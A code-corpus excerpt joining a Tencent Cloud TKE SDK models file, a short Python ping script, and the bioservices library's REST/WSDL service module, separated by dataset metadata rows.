:type PublicIpAddresses: list of str
:param CreatedTime: 创建时间。按照ISO8601标准表示,并且使用UTC时间。格式为:YYYY-MM-DDThh:mm:ssZ。
注意:此字段可能返回 null,表示取不到有效值。
:type CreatedTime: str
:param InstanceChargeType: 实例计费模式。取值范围:
PREPAID:表示预付费,即包年包月
POSTPAID_BY_HOUR:表示后付费,即按量计费
CDHPAID:CDH付费,即只对CDH计费,不对CDH上的实例计费。
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceChargeType: str
:param CPU: 实例的CPU核数,单位:核。
注意:此字段可能返回 null,表示取不到有效值。
:type CPU: int
:param Memory: 实例内存容量,单位:GB。
注意:此字段可能返回 null,表示取不到有效值。
:type Memory: int
:param OsName: 操作系统名称。
注意:此字段可能返回 null,表示取不到有效值。
:type OsName: str
:param InstanceType: 实例机型。
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceType: str
"""
self.Usable = None
self.UnusableReason = None
self.AlreadyInCluster = None
self.InstanceId = None
self.InstanceName = None
self.PrivateIpAddresses = None
self.PublicIpAddresses = None
self.CreatedTime = None
self.InstanceChargeType = None
self.CPU = None
self.Memory = None
self.OsName = None
self.InstanceType = None
def _deserialize(self, params):
self.Usable = params.get("Usable")
self.UnusableReason = params.get("UnusableReason")
self.AlreadyInCluster = params.get("AlreadyInCluster")
self.InstanceId = params.get("InstanceId")
self.InstanceName = params.get("InstanceName")
self.PrivateIpAddresses = params.get("PrivateIpAddresses")
self.PublicIpAddresses = params.get("PublicIpAddresses")
self.CreatedTime = params.get("CreatedTime")
self.InstanceChargeType = params.get("InstanceChargeType")
self.CPU = params.get("CPU")
self.Memory = params.get("Memory")
self.OsName = params.get("OsName")
self.InstanceType = params.get("InstanceType")
class ExistedInstancesForNode(AbstractModel):
"""不同角色的已存在节点配置参数
"""
def __init__(self):
"""
:param NodeRole: 节点角色,取值:MASTER_ETCD, WORKER。MASTER_ETCD只有在创建 INDEPENDENT_CLUSTER 独立集群时需要指定。
:type NodeRole: str
:param ExistedInstancesPara: 已存在实例的重装参数
:type ExistedInstancesPara: :class:`tencentcloud.tke.v20180525.models.ExistedInstancesPara`
"""
self.NodeRole = None
self.ExistedInstancesPara = None
def _deserialize(self, params):
self.NodeRole = params.get("NodeRole")
if params.get("ExistedInstancesPara") is not None:
self.ExistedInstancesPara = ExistedInstancesPara()
self.ExistedInstancesPara._deserialize(params.get("ExistedInstancesPara"))
class ExistedInstancesPara(AbstractModel):
"""已存在实例的重装参数
"""
def __init__(self):
"""
:param InstanceIds: 集群ID
:type InstanceIds: list of str
:param InstanceAdvancedSettings: 实例额外需要设置参数信息
:type InstanceAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.InstanceAdvancedSettings`
:param EnhancedService: 增强服务。通过该参数可以指定是否开启云安全、云监控等服务。若不指定该参数,则默认开启云监控、云安全服务。
:type EnhancedService: :class:`tencentcloud.tke.v20180525.models.EnhancedService`
:param LoginSettings: 节点登录信息(目前仅支持使用Password或者单个KeyIds)
:type LoginSettings: :class:`tencentcloud.tke.v20180525.models.LoginSettings`
:param SecurityGroupIds: 实例所属安全组。该参数可以通过调用 DescribeSecurityGroups 的返回值中的sgId字段来获取。若不指定该参数,则绑定默认安全组。(目前仅支持设置单个sgId)
:type SecurityGroupIds: list of str
"""
self.InstanceIds = None
self.InstanceAdvancedSettings = None
self.EnhancedService = None
self.LoginSettings = None
self.SecurityGroupIds = None
def _deserialize(self, params):
self.InstanceIds = params.get("InstanceIds")
if params.get("InstanceAdvancedSettings") is not None:
self.InstanceAdvancedSettings = InstanceAdvancedSettings()
self.InstanceAdvancedSettings._deserialize(params.get("InstanceAdvancedSettings"))
if params.get("EnhancedService") is not None:
self.EnhancedService = EnhancedService()
self.EnhancedService._deserialize(params.get("EnhancedService"))
if params.get("LoginSettings") is not None:
self.LoginSettings = LoginSettings()
self.LoginSettings._deserialize(params.get("LoginSettings"))
self.SecurityGroupIds = params.get("SecurityGroupIds")
class Filter(AbstractModel):
"""过滤器
"""
def __init__(self):
"""
:param Name: 属性名称, 若存在多个Filter时,Filter间的关系为逻辑与(AND)关系。
:type Name: str
:param Values: 属性值, 若同一个Filter存在多个Values,同一Filter下Values间的关系为逻辑或(OR)关系。
:type Values: list of str
"""
self.Name = None
self.Values = None
def _deserialize(self, params):
self.Name = params.get("Name")
self.Values = params.get("Values")
class Instance(AbstractModel):
"""集群的实例信息
"""
def __init__(self):
"""
:param InstanceId: 实例ID
:type InstanceId: str
:param InstanceRole: 节点角色, MASTER, WORKER, ETCD, MASTER_ETCD,ALL, 默认为WORKER
:type InstanceRole: str
:param FailedReason: 实例异常(或者处于初始化中)的原因
:type FailedReason: str
:param InstanceState: 实例的状态(running 运行中,initializing 初始化中,failed 异常)
:type InstanceState: str
"""
self.InstanceId = None
self.InstanceRole = None
self.FailedReason = None
self.InstanceState = None
def _deserialize(self, params):
self.InstanceId = params.get("InstanceId")
self.InstanceRole = params.get("InstanceRole")
self.FailedReason = params.get("FailedReason")
self.InstanceState = params.get("InstanceState")
class InstanceAdvancedSettings(AbstractModel):
"""描述了k8s集群相关配置与信息。
"""
def __init__(self):
"""
:param MountTarget: 数据盘挂载点, 默认不挂载数据盘. 已格式化的 ext3,ext4,xfs 文件系统的数据盘将直接挂载,其他文件系统或未格式化的数据盘将自动格式化为ext4 并挂载,请注意备份数据! 无数据盘或有多块数据盘的云主机此设置不生效。
:type MountTarget: str
:param DockerGraphPath: dockerd --graph 指定值, 默认为 /var/lib/docker
:type DockerGraphPath: str
:param UserScript: base64 编码的用户脚本, 此脚本会在 k8s 组件运行后执行, 需要用户保证脚本的可重入及重试逻辑, 脚本及其生成的日志文件可在节点的 /data/ccs_userscript/ 路径查看, 如果要求节点需要在进行初始化完成后才可加入调度, 可配合 unschedulable 参数使用, 在 userScript 最后初始化完成后, 添加 kubectl uncordon nodename --kubeconfig=/root/.kube/config 命令使节点加入调度
:type UserScript: str
:param Unschedulable: 设置加入的节点是否参与调度,默认值为0,表示参与调度;非0表示不参与调度, 待节点初始化完成之后, 可执行kubectl uncordon nodename使node加入调度.
:type Unschedulable: int
"""
self.MountTarget = None
self.DockerGraphPath = None
self.UserScript = None
self.Unschedulable = None
def _deserialize(self, params):
self.MountTarget = params.get("MountTarget")
self.DockerGraphPath = params.get("DockerGraphPath")
self.UserScript = params.get("UserScript")
self.Unschedulable = params.get("Unschedulable")
class LoginSettings(AbstractModel):
"""描述了实例登录相关配置与信息。
"""
def __init__(self):
"""
:param Password: 实例登录密码。不同操作系统类型密码复杂度限制不一样,具体如下:<br><li>Linux实例密码必须8到16位,至少包括两项[a-z,A-Z]、[0-9] 和 [( ) ` ~ ! @ # $ % ^ & * - + = | { } [ ] : ; ' , . ? / ]中的特殊符号。<br><li>Windows实例密码必须12到16位,至少包括三项[a-z],[A-Z],[0-9] 和 [( ) ` ~ ! @ # $ % ^ & * - + = { } [ ] : ; ' , . ? /]中的特殊符号。<br><br>若不指定该参数,则由系统随机生成密码,并通过站内信方式通知到用户。
注意:此字段可能返回 null,表示取不到有效值。
:type Password: str
:param KeyIds: 密钥ID列表。关联密钥后,就可以通过对应的私钥来访问实例;KeyId可通过接口DescribeKeyPairs获取,密钥与密码不能同时指定,同时Windows操作系统不支持指定密钥。当前仅支持购买的时候指定一个密钥。
注意:此字段可能返回 null,表示取不到有效值。
:type KeyIds: list of str
:param KeepImageLogin: 保持镜像的原始设置。该参数与Password或KeyIds.N不能同时指定。只有使用自定义镜像、共享镜像或外部导入镜像创建实例时才能指定该参数为TRUE。取值范围:<br><li>TRUE:表示保持镜像的登录设置<br><li>FALSE:表示不保持镜像的登录设置<br><br>默认取值:FALSE。
注意:此字段可能返回 null,表示取不到有效值。
:type KeepImageLogin: str
"""
self.Password = None
self.KeyIds = None
self.KeepImageLogin = None
def _deserialize(self, params):
self.Password = params.get("Password")
self.KeyIds = params.get("KeyIds")
self.KeepImageLogin = params.get("KeepImageLogin")
class RunInstancesForNode(AbstractModel):
"""不同角色的节点配置参数
"""
def __init__(self):
"""
:param NodeRole: 节点角色,取值:MASTER_ETCD, WORKER。MASTER_ETCD只有在创建 INDEPENDENT_CLUSTER 独立集群时需要指定。
:type NodeRole: str
:param RunInstancesPara: CVM创建透传参数,json化字符串格式,详见[CVM创建实例](https://cloud.tencent.com/document/product/213/15730)接口,传入公共参数外的其他参数即可,其中ImageId会替换为TKE集群OS对应的镜像。
:type RunInstancesPara: list of str
"""
self.NodeRole = None
self.RunInstancesPara = None
def _deserialize(self, params):
self.NodeRole = params.get("NodeRole")
self.RunInstancesPara = params.get("RunInstancesPara")
class RunMonitorServiceEnabled(AbstractModel):
"""描述了 “云监控” 服务相关的信息
"""
def __init__(self):
"""
:param Enabled: 是否开启[云监控](/document/product/248)服务。取值范围:<br><li>TRUE:表示开启云监控服务<br><li>FALSE:表示不开启云监控服务<br><br>默认取值:TRUE。
:type Enabled: bool
"""
self.Enabled = None
def _deserialize(self, params):
self.Enabled = params.get("Enabled")
class RunSecurityServiceEnabled(AbstractModel):
"""描述了 “云安全” 服务相关的信息
"""
def __init__(self):
"""
:param Enabled: 是否开启[云安全](/document/product/296)服务。取值范围:<br><li>TRUE:表示开启云安全服务<br><li>FALSE:表示不开启云安全服务<br><br>默认取值:TRUE。
:type Enabled: bool
"""
self.Enabled = None
def _deserialize(self, params):
self.Enabled = params.get("Enabled") | [
"[email protected]"
] | |
f77ea489f20c231434ca0f1caea9de519cf3ca2f | b7a2a80843fa5141ffb9c7b4439f1d2ac713af30 | /Version2/SystemKommandos.py | 3eb10a56a4624476aab5ba3c18ba953ddb6bde07 | [] | no_license | wunnox/python_grundlagen | df1bc2b9b1b561bd6733ccc25305e799a48e714e | fa84d7aae7332a7acbb3ba7ff0fe2216cc345fc0 | refs/heads/master | 2023-05-01T12:19:23.208445 | 2023-04-16T11:29:01 | 2023-04-16T11:29:01 | 222,099,539 | 2 | 3 | null | 2019-12-19T10:56:43 | 2019-11-16T12:57:54 | Python | UTF-8 | Python | false | false | 323 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
log = os.popen("ping -c 1 google.com").readlines()
for zeile in log:
print(zeile.replace("\n", ""))
# oder
if os.system("ping -c 1 google.com") == 0:
print("IP ist erreichbar")
else:
print("IP ist NICHT erreichbar")
| [
"[email protected]"
] | |
7f2cffad15097d2569d02638773032d76f757de4 | 8cbbec003a96286a70549c75233568c9fc668c12 | /src/bioservices/services.py | f853f9840f0a2e9b2b4de0abca30ed64bd0e3206 | [] | no_license | pjshort/bioservices | bce6e623b5d88bf9dbf6ca4a4cfb89a4106b6b5d | 7f2f948a03089cb47f9dda3954f4c0697a0fddee | refs/heads/master | 2020-12-11T03:47:26.414665 | 2014-11-22T14:41:44 | 2014-11-22T14:41:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,520 | py | # -*- python -*-
#
# This file is part of bioservices software
#
# Copyright (c) 2013-2014 - EBI-EMBL
#
# File author(s):
# https://github.com/cokelaer/bioservices
#
# Distributed under the GPLv3 License.
# See accompanying file LICENSE.txt or copy at
# http://www.gnu.org/licenses/gpl-3.0.html
#
# documentation: http://packages.python.org/bioservices
#
##############################################################################
#$Id$
"""Modules with common tools to access web resources"""
from __future__ import print_function
import os
import sys
import socket
import platform
import json
from bioservices.settings import BioServicesConfig
# fixing compatiblity python 2 and 3 related to merging or urllib and urllib2 in python 3
try:
#python 3
from urllib.request import urlopen
from urllib.parse import urlparse, urlencode
from urllib.error import HTTPError
from urllib.request import Request
except:
from urllib import urlencode
from urllib2 import urlopen, Request, HTTPError
# This is a hack in case suds is already installed.
# Indded, we want suds_jurko instead
sys.path = [x for x in sys.path if 'suds-' not in x]
import easydev
from easydev import Logging
__all__ = ["Service", "WSDLService", "RESTService",
"BioServicesError", "REST"]
class BioServicesError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
# could be part of easydev itself but for now, let us keep it here
# inside bioservices
class DevTools(object):
"""wrapper around useful functions.
See easydev documentation for details.
"""
def check_range(self, a, b, value):
easydev.check_range(a, b, value, strict=False)
def transform_into_list(self, query):
print("deprecated transform_to_list. use tolist instead")
return easydev.tolist(query)
def check_param_in_list(self, param, valid_values):
easydev.check_param_in_list(param, valid_values)
def swapdict(self, d):
return easydev.swapdict(d)
def tolist(self, query):
return easydev.codecs.tolist(query)
def list2string(self, query, sep=",", space=False):
return easydev.codecs.list2string(query, sep=sep, space=space)
def to_json(self, dictionary):
return json.dumps(dictionary)
class Service(Logging):
"""Base class for WSDL and REST classes
.. seealso:: :class:`REST`, :class:`WSDLService`
"""
#: some useful response codes
response_codes = {
200: 'OK',
201: 'Created',
400: 'Bad Request. There is a problem with your input',
404: 'Not found. The resource you requests does not exist',
406: "Not Acceptable. Usually headers issue",
410: 'Gone. The resource you requested was removed.',
415: "Unsupported Media Type",
500: 'Internal server error. Most likely a temporary problem',
503: 'Service not available. The server is being updated, try again later'
}
def __init__(self, name, url=None, verbose=True, requests_per_sec=3):
""".. rubric:: Constructor
:param str name: a name for this service
:param str url: its URL
:param bool verbose: prints informative messages if True (default is
True)
:param requests_per_sec: maximum number of requests per seconds
are restricted to 3. You can change that value. If you reach the
limit, an error is raise. The reason for this limitation is
that some services (e.g.., NCBI) may black list you IP.
If you need or can do more (e.g., ChEMBL does not seem to have
restrictions), change the value. You can also have several instance
but again, if you send too many requests at the same, your future
requests may be retricted. Currently implemented for REST only
All instances have an attribute called :attr:`~Service.logging` that
is an instanceof the :mod:`logging` module. It can be used to print
information, warning, error messages::
self.logging.info("informative message")
self.logging.warning("warning message")
self.logging.error("error message")
The attribute :attr:`~Service.debugLevel` can be used to set the behaviour
of the logging messages. If the argument verbose is True, the debugLebel
is set to INFO. If verbose if False, the debugLevel is set to WARNING.
However, you can use the :attr:`debugLevel` attribute to change it to
one of DEBUG, INFO, WARNING, ERROR, CRITICAL. debugLevel=WARNING means
that only WARNING, ERROR and CRITICAL messages are shown.
"""
super(Service, self).__init__(level=verbose)
self.requests_per_sec = requests_per_sec
self._url = url
try:
if self.url is not None:
urlopen(self.url)
except Exception as err:
self.logging.warning("The URL (%s) provided cannot be reached." % self.url)
self.name = name
self._easyXMLConversion = True
# used by HGNC where some XML contains non-utf-8 characters !!
# should be able to fix it with requests once HGNC works again
#self._fixing_unicode = False
#self._fixing_encoding = "utf-8"
self.devtools = DevTools()
self.settings = BioServicesConfig()
def _get_url(self):
return self._url
def _set_url(self, url):
# something more clever here to check the URL e.g. starts with http
if url is not None:
url = url.rstrip("/")
self._url = url
url = property(_get_url, _set_url, doc="URL of this service")
def _get_easyXMLConversion(self):
return self._easyXMLConversion
def _set_easyXMLConversion(self, value):
if isinstance(value, bool) is False:
raise TypeError("value must be a boolean value (True/False)")
self._easyXMLConversion = value
easyXMLConversion = property(_get_easyXMLConversion,
_set_easyXMLConversion,
doc="""If True, xml output from a request are converted to easyXML object (Default behaviour).""")
def easyXML(self, res):
"""Use this method to convert a XML document into an
:class:`~bioservices.xmltools.easyXML` object
The easyXML object provides utilities to ease access to the XML
tag/attributes.
Here is a simple example starting from the following XML
.. doctest::
>>> from bioservices import *
>>> doc = "<xml> <id>1</id> <id>2</id> </xml>"
>>> s = Service("name")
>>> res = s.easyXML(doc)
>>> res.findAll("id")
[<id>1</id>, <id>2</id>]
"""
from bioservices import xmltools
return xmltools.easyXML(res)
def __str__(self):
txt = "This is an instance of %s service" % self.name
return txt
def pubmed(self, Id):
"""Open a pubmed Id into a browser tab
:param Id: a valid pubmed Id in string or integer format.
The URL is a concatenation of the pubmed URL
http://www.ncbi.nlm.nih.gov/pubmed/ and the provided Id.
"""
url = "http://www.ncbi.nlm.nih.gov/pubmed/"
import webbrowser
webbrowser.open(url + str(Id))
def on_web(self, url):
"""Open a URL into a browser"""
import webbrowser
webbrowser.open(url)
def save_str_to_image(self, data, filename):
"""Save string object into a file converting into binary"""
with open(filename,'wb') as f:
import binascii
try:
#python3
newres = binascii.a2b_base64(bytes(data, "utf-8"))
except:
newres = binascii.a2b_base64(data)
f.write(newres)
class WSDLService(Service):
"""Class dedicated to the web services based on WSDL/SOAP protocol.
.. seealso:: :class:`RESTService`, :class:`Service`
"""
_service = "WSDL"
def __init__(self, name, url, verbose=True):
""".. rubric:: Constructor
:param str name: a name e.g. Kegg, Reactome, ...
:param str url: the URL of the WSDL service
:param bool verbose: prints informative messages
The :attr:`serv` give access to all WSDL functionalities of the service.
The :attr:`methods` is an alias to self.serv.methods and returns
the list of functionalities.
"""
super(WSDLService, self).__init__(name, url, verbose=verbose)
self.logging.info("Initialising %s service (WSDL)" % self.name)
try:
#: attribute to access to the methods provided by this WSDL service
from suds.client import Client
self.suds = Client(self.url)
# reference to the service
self.serv = self.suds.service
self._update_settings()
except Exception:
self.logging.error("Could not connect to the service %s " % self.url)
raise Exception
def _update_settings(self):
self.TIMEOUT = self.settings.TIMEOUT
def wsdl_methods_info(self):
methods = self.suds.wsdl.services[0].ports[0].methods.values()
for method in methods:
try:
print('%s(%s) ' % (
method.name,
', '.join('type:%s: %s - element %s' %
(part.type, part.name, part.element) for part in
method.soap.input.body.parts)))
except:
print(method)
def _get_methods(self):
return [x.name for x in
self.suds.wsdl.services[0].ports[0].methods.values()]
wsdl_methods = property(_get_methods,
doc="returns methods available in the WSDL service")
def wsdl_create_factory(self, name, **kargs):
params = self.suds.factory.create(name)
# e.g., for eutils
if "email" in dict(params).keys():
params.email = self.settings.params['user.email'][0]
if "tool" in dict(params).keys():
import bioservices
params.tool = "BioServices, " + bioservices.__version__
for k,v in kargs.items():
from suds import sudsobject
keys = sudsobject.asdict(params).keys()
if k in keys:
params[k] = v
else:
msg = "{0} incorrect. Correct ones are {1}"
self.logging.error(msg.format(k, keys))
return params
def _get_timeout(self):
return self.suds.options.timeout
def _set_timeout(self, value):
self.suds.set_options(timeout=value)
self.settings.TIMEOUT = value
TIMEOUT = property(_get_timeout, _set_timeout)
class RESTbase(Service):
_service = "REST"
def __init__(self, name, url=None, verbose=True):
super(RESTbase, self).__init__(name, url, verbose=verbose)
self.logging.info("Initialising %s service (REST)" % self.name)
self.last_response = None
def http_get(self):
# should return unicode
raise NotImplementedError
def http_post(self):
raise NotImplementedError
def http_put(self):
raise NotImplementedError
def http_delete(self):
raise NotImplementedError
class RESTService(RESTbase):
"""Class to manipulate REST service
You can request an URL with this class that also inherits from
:class:`Service`.
For debugging:
* last_response contains
"""
def __init__(self, name, url=None, verbose=True):
""".. rubric:: Constructor
:param str name: a name e.g. Kegg, Reactome, ...
:param str url: the URL of the REST service
:param str debugLevel: logging level. See :class:`Service`.
"""
super(RESTService, self).__init__(name, url, verbose=verbose)
self.logging.error("Please use REST class instead of RESTService")
self.trials = 5
self.timesleep = 1
def getUserAgent(self):
self.logging.info('getUserAgent: Begin')
try:
import urllib2
urllib_agent = 'Python-urllib/%s' % urllib2.__version__
except:
import urllib
urllib_agent = 'Python-urllib/%s' % urllib.__version__
#clientRevision = ''
clientVersion = ''
user_agent = 'EBI-Sample-Client/%s (%s; Python %s; %s) %s' % (
clientVersion, os.path.basename(__file__),
platform.python_version(), platform.system(),
urllib_agent
)
self.logging.info('getUserAgent: user_agent: ' + user_agent)
self.logging.info('getUserAgent: End')
return user_agent
def request(self, path, format="xml", baseUrl=True):
"""Send a request via an URL to the web service.
:param str path: the request will be formed as self.url+/+path
:param str format: If the expected output is in XML
format then it will be converted with :meth:`easyXML`. If the
returned document is not in XML, format should be set to any other
value.
:param str baseUrl: By default, the path argument is appended to the
:attr:`url` attribute (the main REST URL). However, sometimes, you
would prefer to provide the entire URL yourself (e.g. in psicquic service)
If so, set this baseUrl argument to False.
.. note:: this is a HTTP GET request
.. seealso:: for developers see also the :meth:`_request_timeout`
if the site is down or busy.
.. note:: you can set the timeout of the connection, which is 1000
seconds by default by changing the :attr:`timeout`.
"""
for i in range(0, self.trials):
res = self._get_request(path, format=format, baseUrl=baseUrl)
if res is not None:
break
import time
self.logging.warning("request seemed to have failed.")
if i!=self.trials-1:
print("Trying again trial {}/{}".format(i+1, self.trials))
time.sleep(self.timesleep)
return res
def http_get(self, path, format="xml", baseUrl=True):
return self.request(path, format=format, baseUrl=baseUrl)
def _get_request(self, path, format="xml", baseUrl=True):
if path.startswith(self.url):
url = path
elif baseUrl is False:
url = path
else:
url = self.url + "/" + path
self.logging.debug("REST.bioservices.%s request begins" % self.name)
self.logging.debug("--Fetching url=%s" % url)
if len(url)> 2000:
print(url)
raise ValueError("URL length (%s) exceeds 2000. Please use a differnt URL" % len(url))
try:
res = urlopen(url).read()
if format=="xml":
if self.easyXMLConversion:
#logging.warning("--Conversion to easyXML"),
try:
res = self.easyXML(res)
except Exception as err:
self.logging.warning(err.message)
self.logging.warning("--Conversion to easyXML failed. returns the raw response"),
self.last_response = res
return res
except socket.timeout:
self.logging.warning("Time out. consider increasing the timeout attribute (currently set to {})".format(self.timeout))
except Exception as err:
self.logging.debug(err.message)
self.logging.debug("An exception occured while reading the URL")
self.logging.debug(url)
self.logging.debug("Error caught within bioservices. Invalid requested URL ? ")
def requestPost(self, requestUrl, params, extra=None):
"""request with a POST method.
:param str requestUrl: the entire URL to request
:param dict params: the dictionary of parameter/value pairs
:param str extra: an additional string to add after the params if
needed. Could be usefule if a parameter/value can not be added to the
dictionary. For instance is a parameter has several values
Solved in requests module.
.. todo:: parameter paranName with a list of values [v1,v2] can be interpreted as
paramName=v1¶mName=v2
.. note:: this is a HTTP POST request
.. note:: use only by ::`ncbiblast` service so far.
"""
requestData = urlencode(params)
print(requestData)
if extra is not None:
requestData += extra
# Concatenate the two parts.
# Errors are indicated by HTTP status codes.
try:
# Set the HTTP User-agent.
user_agent = self.getUserAgent()
http_headers = {'User-Agent': user_agent}
print(requestUrl)
req = Request(requestUrl, None, http_headers)
# Make the submission (HTTP POST).
print(req)
reqH = urlopen(req, requestData)
jobId = reqH.read()
reqH.close()
except HTTPError as err:
# Trap exception and output the document to get error message.
print(sys.stderr, ex.read())
raise
return jobId
def urlencode(self, params):
"""Returns a string compatible with a URL request.
:param dict params: a dictionary. Keys are parameters.
The pair of key/value are converted into a single string by concatenated
the "&key=value" string for each key/value in the dictionary.
::
>>> params = {'a':1, 'b':2}
>>> urlencode(params)
"a=1&b=2"
.. note:: returns "a=1&b=2" or "b=2&a=1" since dictionary are not ordered. Note
that the first parameter is not preceded by a & sign that you will need
to add.
"""
if isinstance(params, dict)is False:
raise TypeError("Params must be a dictionary.")
postData = urlencode(params)
return postData
import requests # replacement for urllib2 (2-3 times faster)
from requests.models import Response
import requests_cache # use caching wihh requests
#import grequests # use asynchronous requests with gevent
# Note that grequests should be imported after requests_cache. Otherwise,
# one should use a session instance when calling grequests.get, which we do
# here below
class REST(RESTbase):
"""
The ideas (sync/async) and code using requests were inspired from the chembl
python wrapper but significantly changed.
Get one value::
>>> from bioservices import REST
>>> s = REST("test", "https://www.ebi.ac.uk/chemblws")
>>> res = s.get_one("targets/CHEMBL2476.json", "json")
>>> res['organism']
u'Homo sapiens'
The caching has two major interests. First one is that it speed up requests if
you repeat requests. ::
>>> s = REST("test", "https://www.ebi.ac.uk/chemblws")
>>> s.CACHING = True
>>> # requests will be stored in a local sqlite database
>>> s.get_one("targets/CHEMBL2476")
>>> # Disconnect your wiki and any network connections.
>>> # Without caching you cannot fetch any requests but with
>>> # the CACHING on, you can retrieve previous requests:
>>> s.get_one("targets/CHEMBL2476")
Advantages of requests over urllib
requests length is not limited to 2000 characters
http://www.g-loaded.eu/2008/10/24/maximum-url-length/
"""
content_types = {
'bed': 'text/x-bed',
'default': "application/x-www-form-urlencoded",
'gff3': 'text/x-gff3',
'fasta': 'text/x-fasta',
'json': 'application/json',
"jsonp": "text/javascript",
"nh": "text/x-nh",
'phylip': 'text/x-phyloxml+xml',
'phyloxml': 'text/x-phyloxml+xml',
'seqxml': 'text/x-seqxml+xml',
'txt': 'text/plain',
'text': 'text/plain',
'xml': 'application/xml',
'yaml': 'text/x-yaml'
}
#special_characters = ['/', '#', '+']
def __init__(self, name, url=None, verbose=True, cache=False):
super(REST, self).__init__(name, url, verbose=verbose)
self.CACHE_NAME = self.name + "_bioservices_database"
self._session = None
self.settings.params['cache.on'][0] = cache
if self.CACHING:
#import requests_cache
self.logging.info("Using local cache %s" % self.CACHE_NAME)
requests_cache.install_cache(self.CACHE_NAME)
def delete_cache(self):
import os
if os.path.exists(self.CACHE_NAME + '.sqlite'):
msg = "You are about to delete this bioservices cache %s. proceed y/n"
res = raw_input(msg % self.CACHE_NAME)
if res == "y":
os.remove(self.CACHE_NAME + '.sqlite')
print("done")
else:
print("reply 'y' to delete the file")
def clear_cache(self):
from requests_cache import clear
clear()
def _get_session(self):
if self._session is None:
if self.CACHING is True:
self._session = self._create_cache_session()
else:
self._session = self._create_session()
return self._session
session = property(_get_session)
def _create_session(self):
"""Creates a normal session using HTTPAdapter
max retries is defined in the :attr:`MAX_RETRIES`
"""
self.logging.debug("Creating session (uncached version)")
self._session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=self.settings.MAX_RETRIES)
#, pool_block=True does not work with asynchronous requests
self._session.mount('http://', adapter)
self._session.mount('https://', adapter)
return self._session
def _create_cache_session(self):
"""Creates a cached session using requests_cache package"""
self.logging.debug("Creating session (cache version)")
if not self._session:
#import requests_cache
self.logging.debug("No cached session created yet. Creating one")
self._session = requests_cache.CachedSession(self.CACHE_NAME,
backend='sqlite', fast_save=self.settings.FAST_SAVE)
return self._session
def _get_caching(self):
return self.settings.params['cache.on'][0]
def _set_caching(self, caching):
self.devtools.check_param_in_list(caching, [True, False])
self.settings.params['cache.on'][0] = caching
# reset the session, which will be automatically created if we
# access to the session attribute
self._session = None
CACHING = property(_get_caching, _set_caching)
def _get_timeout(self):
return self.settings.TIMEOUT
def _set_timeout(self, value):
self.settings.TIMEOUT = value
TIMEOUT = property(_get_timeout, _set_timeout)
def _process_get_request(self, url, session, frmt, data=None, **kwargs):
try:
res = session.get(url, **kwargs)
self.last_response = res
res = self._interpret_returned_request(res, frmt)
return res
except Exception:
return None
def _interpret_returned_request(self, res, frmt):
# must be a Response
if isinstance(res, Response) is False:
return res
# if a response, there is a status code that should be ok
if not res.ok:
reason = res.reason
self.logging.warning("status is not ok with {0}".format(reason))
return res.status_code
if frmt == "json":
try:
return res.json()
except:
return res
# finally
return res.content
def _apply(self, iterable, fn, *args, **kwargs):
return [fn(x, *args, **kwargs) for x in iterable if x is not None]
def _get_async(self, keys, frmt='json', params={}):
# does not work under pyhon3 so local import
import grequests
session = self._get_session()
try:
# build the requests
urls = self._get_all_urls(keys, frmt)
self.logging.debug("grequests.get processing")
rs = (grequests.get(url, session=session, params=params) for key,url in zip(keys, urls))
# execute them
self.logging.debug("grequests.map call")
ret = grequests.map(rs, size=min(self.settings.CONCURRENT, len(keys)))
self.last_response = ret
self.logging.debug("grequests.map call done")
return ret
except Exception as err:
self.logging.warning("Error caught in async. " + err.message)
return []
def _get_all_urls(self, keys, frmt=None):
return ('%s/%s' % (self.url, query) for query in keys)
def get_async(self, keys, frmt='json', params={}, **kargs):
ret = self._get_async(keys, frmt, params=params, **kargs)
return self._apply(ret, self._interpret_returned_request, frmt)
def get_sync(self, keys, frmt='json', **kargs):
return [self.get_one(key, frmt=frmt, **kargs) for key in keys]
def http_get(self, query, frmt='json', params={}, **kargs):
"""
* query is the suffix that will be appended to the main url attribute.
* query is either a string or a list of strings.
* if list is larger than ASYNC_THRESHOLD, use asynchronous call.
"""
if isinstance(query, list) and len(query) > self.settings.ASYNC_THRESHOLD:
self.logging.debug("Running async call for a list")
return self.get_async(query, frmt, params=params, **kargs)
if isinstance(query, list) and len(query) <= self.settings.ASYNC_THRESHOLD:
self.logging.debug("Running sync call for a list")
return [self.get_one(key, frmt, params=params, **kargs) for key in query]
#return self.get_sync(query, frmt)
# OTHERWISE
self.logging.debug("Running http_get (single call mode)")
#return self.get_one(**{'frmt': frmt, 'query': query, 'params':params})
return self.get_one(query, frmt, params=params, **kargs)
def get_one(self, query, frmt='json', params={}, **kargs):
"""
if query starts with http:// do not use self.url
"""
if query is None:
url = self.url
else:
if query.startswith("http"):
# assume we do want to use self.url
url = query
else:
url = '%s/%s' % (self.url, query)
self.logging.debug(url)
try:
kargs['params'] = params
kargs['timeout'] = self.TIMEOUT
#res = self.session.get(url, **{'timeout':self.TIMEOUT, 'params':params})
res = self.session.get(url, **kargs)
self.last_response = res
res = self._interpret_returned_request(res, frmt)
try:
# for python 3 compatibility
res = res.decode()
except:
pass
return res
except Exception as err:
print(err)
print("Issue while Your current timeout is {0}. Consider increasing it with"\
"settings.TIMEOUT attribute".format(self.settings.TIMEOUT))
def http_post(self, query, params=None, data=None,
frmt='xml', headers=None, files=None, **kargs):
# query and frmt are bioservices parameters. Others are post parameters
# NOTE in requests.get you can use params parameter
# BUT in post, you use data
# only single post implemented for now unlike get that can be asynchronous
# or list of queries
if headers is None:
headers = {}
headers['User-Agent'] = self.getUserAgent()
headers['Accept'] = self.content_types[frmt]
self.logging.debug("Running http_post (single call mode)")
kargs.update({'query':query})
kargs.update({'headers':headers})
kargs.update({'files':files})
kargs.update({'params':params})
kargs.update({'data':data})
kargs.update({'frmt':frmt})
return self.post_one(**kargs)
def post_one(self, query, frmt='json', **kargs):
if query is None:
url = self.url
else:
url = '%s/%s' % (self.url, query)
self.logging.debug(url)
try:
res = self.session.post(url, **kargs)
self.last_response = res
res = self._interpret_returned_request(res, frmt)
try:
return res.decode()
except:
return res
except Exception as err:
print(err)
return None
def getUserAgent(self):
self.logging.info('getUserAgent: Begin')
urllib_agent = 'Python-requests/%s' % requests.__version__
#clientRevision = ''
clientVersion = ''
